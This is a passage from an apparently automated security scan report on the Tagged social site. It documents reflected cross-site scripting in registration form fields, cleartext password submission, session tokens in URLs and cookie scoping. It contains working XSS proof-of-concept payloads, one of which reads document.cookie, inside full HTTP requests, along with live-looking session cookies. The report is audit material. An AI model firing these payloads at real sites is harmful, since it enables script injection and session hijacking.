Content-Type: text/html; charset=UTF-8
Content-Length: 30124

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Tagged - Register</title>
<link rel="stylesheet" type="text/
...[SNIP]...
<input type="text" name="lastName" id="last_name" value="'836e6"style="x:expression(alert(1))"1316b661e82" size="35" maxlength="35" tabindex="2"/>
...[SNIP]...

1.11. http://www.tagged.com/register.html [password parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /register.html

Issue detail

The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78edf"><script>alert(1)</script>c4de70aa9ec was submitted in the password parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register.html?page=index HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Cache-Control: max-age=0
Origin: http://www.tagged.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 409

firstName=%27&lastName=%27&gender=F&birthMonth=1&birthDay=1&birthYear=1970&country=US&city=&zipCode=10010&locale=en_US&email=test%40fastdial.net&password=SkipIt178edf"><script>alert(1)</script>c4de70aa9ec&recaptcha_challenge_field=03AHJ_Vuvg3Y2kXsGuPIlhWuyikRdBtIzqkOceUquqpJrOmviHwVhFQ6OCAr43ftTtvm9OgrSzWyPHupyuTYDkojw2BNp9Wk8cCdQHjENS24H7uNr697tRZy5Qatq54sklox-g2Iuud8NVnS7QkC1neguyFHMAQwcwdA&recaptch
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:22:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 30012

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Tagged - Register</title>
<link rel="stylesheet" type="text/
...[SNIP]...
<input type="password" name="password" value="SkipIt178edf"><script>alert(1)</script>c4de70aa9ec" id="password" tabindex="4" autocomplete="off"/>
...[SNIP]...

1.12. http://www.tagged.com/register.html [zipCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /register.html

Issue detail

The value of the zipCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5ad3"><script>alert(1)</script>9c9cbd70a76 was submitted in the zipCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register.html?page=index HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Cache-Control: max-age=0
Origin: http://www.tagged.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 409

firstName=%27&lastName=%27&gender=F&birthMonth=1&birthDay=1&birthYear=1970&country=US&city=&zipCode=10010c5ad3"><script>alert(1)</script>9c9cbd70a76&locale=en_US&email=test%40fastdial.net&password=SkipIt1&recaptcha_challenge_field=03AHJ_Vuvg3Y2kXsGuPIlhWuyikRdBtIzqkOceUquqpJrOmviHwVhFQ6OCAr43ftTtvm9OgrSzWyPHupyuTYDkojw2BNp9Wk8cCdQHjENS24H7uNr697t
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:21:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 30119

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Tagged - Register</title>
<link rel="stylesheet" type="text/
...[SNIP]...
<input type="text" name="zipCode" id="zipCode" value="10010c5ad3"><script>alert(1)</script>9c9cbd70a76" size="5" maxlength="5" tabindex="7"/>
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www.tagged.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:10:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 37540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="html_head">
<meta name="verify-v1" content="3D/41
...[SNIP]...
</div>
<form id="reg_form" name="reg_form" action="http://www.tagged.com/register.html?page=index" method="post" >
<div id="connect_container" class="connect_container ">
...[SNIP]...
</label>
<input type="password" name="password" value="" id="password" tabindex="13" autocomplete="off"/>
<span class="info hide_me">
...[SNIP]...

2.2. http://www.tagged.com/account_info.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /account_info.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /account_info.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/home.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; connect_status=-1

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:16:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 78142

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Account Info</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text
...[SNIP]...
</div>
<form action="#" id="password_form">
<div id="old_password" class="">
...[SNIP]...
</label>
<input class="text" type="password" id="password_old" name="password_old" /><br />
...[SNIP]...
</label>
<input class="text" type="password" id="password_new" name="password_new" /><br />
...[SNIP]...
</label>
<input class="text" type="password" id="password_conf" name="password_conf" /><br />
...[SNIP]...

2.3. http://www.tagged.com/index.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /index.html?r=%2Fhome.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/api/?application_id=user&format=jsonaa996%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eba49b2dbe3e209c77&session_token=t4urklho6estviojs26it3hs07&method=tagged.reg.logUserActions&actions=%7B%22email%22%3A1%2C%22first_name%22%3A1%2C%22last_name%22%3A1%2C%22birth_month%22%3A1%2C%22birth_day%22%3A1%2C%22birth_year%22%3A1%2C%22zipCode%22%3A1%2C%22password%22%3A1%7D&api_signature=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; connect_status=-1; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:20:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 37138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="html_head">
<meta name="verify-v1" content="3D/41
...[SNIP]...
</div>
<form id="reg_form" name="reg_form" action="http://www.tagged.com/register.html?page=index" method="post" class="use_green_btn" >
<div id="connect_container" class="connect_container ">
...[SNIP]...
</label>
<input type="password" name="password" value="" id="password" tabindex="4" autocomplete="off"/>
<span class="info hide_me">
...[SNIP]...

2.4. http://www.tagged.com/register.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /register.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

POST /register.html?page=index HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Cache-Control: max-age=0
Origin: http://www.tagged.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 409

firstName=%27&lastName=%27&gender=F&birthMonth=1&birthDay=1&birthYear=1970&country=US&city=&zipCode=10010&locale=en_US&email=test%40fastdial.net&password=SkipIt1&recaptcha_challenge_field=03AHJ_Vuvg3Y
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 29969

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Tagged - Register</title>
<link rel="stylesheet" type="text/
...[SNIP]...
</div>
<form name="reg_form" id="reg_form" action="http://www.tagged.com/register.html" method="post" >
<div id="first_page">
...[SNIP]...
</label>
<input type="password" name="password" value="SkipIt1" id="password" tabindex="4" autocomplete="off"/>
<span class="info hide_me">
...[SNIP]...

3. Session token in URL  previous  next
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. http://www.tagged.com/api/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /api/?application_id=user&format=json&session_token=dvhiv3dhhk4sr6bc1ttavum794 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 162


method=tagged.reg.validate&ids=first_name%2Clast_name%2CzipCode%2Clocale%2Cemail%2Cpassword%2CtermsOfService%2C&values=%2C%2C%2Cen_US%2C%2C%2C%2C&api_signature=

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:11:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 129

["{\"stat\":\"ok\",\"diagnostics\":\"2 2.4 24.38\",\"results\":{\"id\":\"\",\"errors\":[\"1020\",\"1021\",\"1024\",1223,1227]}}"]

3.2. http://www.tagged.com/home.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.tagged.com
Path:   /home.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /home.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; S=t4urklho6estviojs26it3hs07

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:14:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 37661

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Home</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css" hr
...[SNIP]...
</p>
<img src="https://h.online-metrix.net/fp/clear.png?org_id=q2cczh8n&session_id=5450052999_1066473879&m=2" alt="" />
<script src="https://h.online-metrix.net/fp/check.js?org_id=q2cczh8n&session_id=5450052999_1066473879" type="text/javascript"></script>
<object type="application/x-shockwave-flash" data="https://h.online-metrix.net/fp/fp.swf?org_id=q2cczh8n&session_id=5450052999_1066473879" width="1" height="1" id="obj_id">
<param name="movie" value="https://h.online-metrix.net/fp/fp.swf?org_id=q2cczh8n&session_id=5450052999_1066473879" />
...[SNIP]...

4. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /account_info.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /account_info.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/home.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; connect_status=-1

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:16:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 78142

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Account Info</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text
...[SNIP]...
</div>
<form action="#" id="password_form">
<div id="old_password" class="">
...[SNIP]...
</label>
<input class="text" type="password" id="password_old" name="password_old" /><br />
...[SNIP]...
</label>
<input class="text" type="password" id="password_new" name="password_new" /><br />
...[SNIP]...
</label>
<input class="text" type="password" id="password_conf" name="password_conf" /><br />
...[SNIP]...

5. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /account_info.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /account_info.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/home.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; connect_status=-1

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:16:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 78142

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Account Info</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text
...[SNIP]...
</div>
<form action="#" id="password_form">
<div id="old_password" class="">
...[SNIP]...
</label>
<input class="text" type="password" id="password_old" name="password_old" /><br />
...[SNIP]...
</label>
<input class="text" type="password" id="password_new" name="password_new" /><br />
...[SNIP]...
</label>
<input class="text" type="password" id="password_conf" name="password_conf" /><br />
...[SNIP]...

6. Cookie scoped to parent domain  previous  next
There are 2 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


6.1. http://www.tagged.com/logout.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /logout.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /logout.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 302 Found
Date: Wed, 29 Dec 2010 02:18:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: S=csgcmen44cm4qi5r4hhhp4pqh5; path=/; domain=tagged.com
Set-Cookie: U=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/
Set-Cookie: U=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/; domain=.tagged.com
Set-Cookie: L=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/
Set-Cookie: L=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/; domain=.tagged.com
Set-Cookie: connect_status=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/
Set-Cookie: connect_status=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/; domain=.tagged.com
Set-Cookie: fbs_123049054388972=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/
Set-Cookie: fbs_123049054388972=deleted; expires=Tue, 29-Dec-2009 02:18:55 GMT; path=/; domain=.tagged.com
Location: http://www.tagged.com/index.html?r=%2Fhome.html
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


6.2. http://www.tagged.com/register.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /register.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /register.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: S=j770r33jejke4i93clqofal2v2; path=/; domain=tagged.com
Set-Cookie: U=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/
Set-Cookie: U=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/; domain=.tagged.com
Set-Cookie: L=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/
Set-Cookie: L=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/; domain=.tagged.com
Set-Cookie: connect_status=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/
Set-Cookie: connect_status=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/; domain=.tagged.com
Set-Cookie: fbs_123049054388972=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/
Set-Cookie: fbs_123049054388972=deleted; expires=Tue, 29-Dec-2009 02:18:43 GMT; path=/; domain=.tagged.com
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Tagged - Register</title>
<link rel="stylesheet" type="text/css
...[SNIP]...

7. Cross-domain Referer leakage  previous  next
There are 5 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

